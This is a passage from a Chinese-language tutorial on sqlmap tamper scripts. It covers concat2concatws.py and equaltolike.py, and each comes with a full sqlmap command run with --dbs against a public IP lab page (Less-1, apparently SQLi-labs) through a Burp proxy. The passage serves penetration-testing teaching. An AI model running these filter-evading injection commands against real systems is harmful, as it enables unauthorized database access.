14. concat2concatws.py脚本
表示使用concat_ws(mid(char(0),0,0),A,D) 替换为concat(A,D),只适用于mysql
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="concat2concatws.py" --proxy="http://127.0.0.1:8080" -batch
发现是可以注入的,使用burp查看抓包的信息,发现并未看到很好的效果
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
15. equaltolike.py脚本
通过使用like这个运算符替换所有的等于号"=" 适用于所有的数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="equaltolike.py" --proxy="http://127.0.0.1:8080" -batch
达到效果,可以正常注入,我们查看下burp的抓包数据
